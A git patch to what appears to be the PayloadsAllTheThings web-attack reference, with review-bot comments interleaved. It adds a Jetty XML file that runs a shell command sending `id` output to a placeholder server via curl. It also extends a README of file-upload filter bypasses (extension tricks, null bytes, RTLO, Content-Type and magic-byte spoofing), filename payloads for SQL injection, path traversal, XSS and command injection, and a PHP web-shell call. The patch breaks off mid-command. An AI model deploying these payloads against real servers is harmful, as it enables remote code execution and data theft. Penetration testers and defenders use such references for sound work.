From fa849c00f234b3972aaa35622846ab50e97573ab Mon Sep 17 00:00:00 2001
From: Swissky <12152583+swisskyrepo@users.noreply.github.com>
Date: Tue, 9 Aug 2022 22:05:45 +0200
Subject: [PATCH] Jetty RCE + Upload tricks
---
.../Jetty RCE/JettyShell.xml | 15 ++++++
Upload Insecure Files/README.md | 54 ++++++++++++++-----
2 files changed, 55 insertions(+), 14 deletions(-)
create mode 100644 Upload Insecure Files/Jetty RCE/JettyShell.xml
diff --git a/Upload Insecure Files/Jetty RCE/JettyShell.xml b/Upload Insecure Files/Jetty RCE/JettyShell.xml
new file mode 100644
index 0000000..769376c
--- /dev/null
+++ b/Upload Insecure Files/Jetty RCE/JettyShell.xml
@@ -0,0 +1,15 @@
+
+
+
+
+
+
+
+ - /bin/sh
+ - -c
+ - curl -F "r=`id`" http://yourServer:1337/
+
+
+
+
+
\ No newline at end of file
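Review bot: the fifteen added lines of JettyShell.xml arrive in this hunk with only the three argument values visible (`/bin/sh`, `-c` and the `curl` line), so the XML elements that should wrap them cannot be checked for well-formedness from the hunk; please confirm the file parses before merge. Two smaller points: the host `yourServer:1337` is a placeholder that nothing in this patch documents as one, and `\ No newline at end of file` means the file should end with a trailing newline.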
diff --git a/Upload Insecure Files/README.md b/Upload Insecure Files/README.md
index a6b11a9..3f5bfba 100644
--- a/Upload Insecure Files/README.md
+++ b/Upload Insecure Files/README.md
@@ -14,6 +14,7 @@
* [CVE - Image Tragik](#cve---image-tragik)
* [CVE - FFMpeg](#cve---ffmpeg)
* [ZIP Archive](#zip-archive)
+ * [Jetty RCE](#jetty-rce)
* [References](#references)
@@ -44,14 +45,22 @@
.phtm
.inc
```
-* ASP Server : `.asp, .aspx, .cer and .asa (IIS <= 7.5), shell.aspx;1.jpg (IIS < 7.0), shell.soap`
-* JSP : `.jsp, .jspx, .jsw, .jsv, .jspf`
+* ASP Server
+ ```powershell
+ .asp
+ .aspx
+ .config
+ .cer and .asa # (IIS <= 7.5)
+ shell.aspx;1.jpg # (IIS < 7.0)
+ shell.soap
+ ```
+* JSP : `.jsp, .jspx, .jsw, .jsv, .jspf, .wss, .do, .action`s
* Perl: `.pl, .pm, .cgi, .lib`
* Coldfusion: `.cfm, .cfml, .cfc, .dbm`
### Upload tricks
-- Use double extensions : `.jpg.php`
+- Use double extensions : `.jpg.php, .png.php5`
- Use reverse double extension (useful to exploit Apache misconfigurations where anything with extension .php, but not necessarily ending in .php will execute code): `.php.jpg`
- Random uppercase and lowercase : `.pHp, .pHP5, .PhAr`
- Null byte (works well against `pathinfo()`)
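Review bot: stray `s` after the closing backtick on the JSP line (`.action`s`); the line should read `.jsp, .jspx, .jsw, .jsv, .jspf, .wss, .do, .action`. Also, the new ASP block is fenced as `powershell` although it is a plain list of file extensions with `#` annotations, not PowerShell; an untagged fence or `text` would be more accurate, and `.config` is the only new extension without a note on where it applies, unlike `.cer and .asa # (IIS <= 7.5)`.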
@@ -63,7 +72,10 @@
* `.php\x00.jpg`
- Special characters
* Multiple dots : `file.php......` , in Windows when a file is created with dots at the end those will be removed.
- * Whitespace characters: `file.php%20`, `file.php%0d%0a.jpg`
+ * Whitespace and new line characters
+ * `file.php%20`
+ * `file.php%0d%0a.jpg`
+ * `file.php%0a`
* Right to Left Override (RTLO): `name.%E2%80%AEphp.jpg` will became `name.gpj.php`.
* Slash: `file.php/`, `file.php.\`, `file.j\sp`, `file.j/sp`
* Multiple special characters: `file.jsp/././././.`
@@ -71,6 +83,7 @@
* `Content-Type : image/gif`
* `Content-Type : image/png`
* `Content-Type : image/jpeg`
+ * Content-Type wordlist: [SecLists/content-type.txt](https://github.com/danielmiessler/SecLists/blob/master/Miscellaneous/web/content-type.txt)
* Set the Content-Type twice: once for unallowed type and once for allowed.
- [Magic Bytes](https://en.wikipedia.org/wiki/List_of_file_signatures)
* Sometimes applications identify file types based on their first signature bytes. Adding/replacing them in a file might trick the application.
@@ -82,15 +95,21 @@
### Filename vulnerabilities
+Sometimes the vulnerability is not the upload but how the file is handled after. You might want to upload files with payloads in the filename.
+
- Time-Based SQLi Payloads: e.g. `poc.js'(select*from(select(sleep(20)))a)+'.extension`
-- LFI Payloads: e.g. `image.png../../../../../../../etc/passwd`
+- LFI/Path Traversal Payloads: e.g. `image.png../../../../../../../etc/passwd`
- XSS Payloads e.g. `'">.extension`
- File Traversal e.g. `../../../tmp/lol.png`
- Command Injection e.g. `; sleep 10;`
+Also you upload:
+- HTML/SVG files to trigger an XSS
+- EICAR file to check the presence of an antivirus
+
### Picture upload with LFI
-Valid pictures hosting PHP code. Upload the picture and use a local file inclusion to execute the code. The shell can be called with the following command : `curl 'http://localhost/test.php?0=system' --data "1='ls'"`.
+Valid pictures hosting PHP code. Upload the picture and use a **Local File Inclusion** to execute the code. The shell can be called with the following command : `curl 'http://localhost/test.php?0=system' --data "1='ls'"`.
- Picture Metadata, hide the payload inside a comment tag in the metadata.
- Picture Resize, hide the payload within the compression algorithm in order to bypass a resize. Also defeating `getimagesize()` and `imagecreatefromgif()`.
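Review bot: `Also you upload:` sits on the line directly after the `- Command Injection e.g. `; sleep 10;`` bullet with no blank line before it, so Markdown will treat it as a lazy continuation of that bullet rather than a new paragraph introducing the second list; insert a blank line, and reword to `You can also upload:`. The blank line added after the new `Sometimes the vulnerability is not the upload...` sentence handles this correctly and the same treatment is needed here.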
@@ -102,19 +121,20 @@ Create a custom picture and insert exif tag with `exiftool`. A list of multiple
```ps1
convert -size 110x110 xc:white payload.jpg
exiftool -Copyright="PayloadsAllTheThings" -Artist="Pentest" -ImageUniqueID="Example" payload.jpg
+exiftool -Comment="
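Review bot: the hunk ends mid-line at `+exiftool -Comment="`, so the value of the new `-Comment` tag and the remainder of the hunk (the header `@@ -102,19 +121,20 @@` announces 20 new lines) are not visible here and cannot be reviewed; please verify the complete file. Minor: the fence is tagged `ps1` while the `convert` and `exiftool` invocations are shell commands; `bash` would be the more accurate tag.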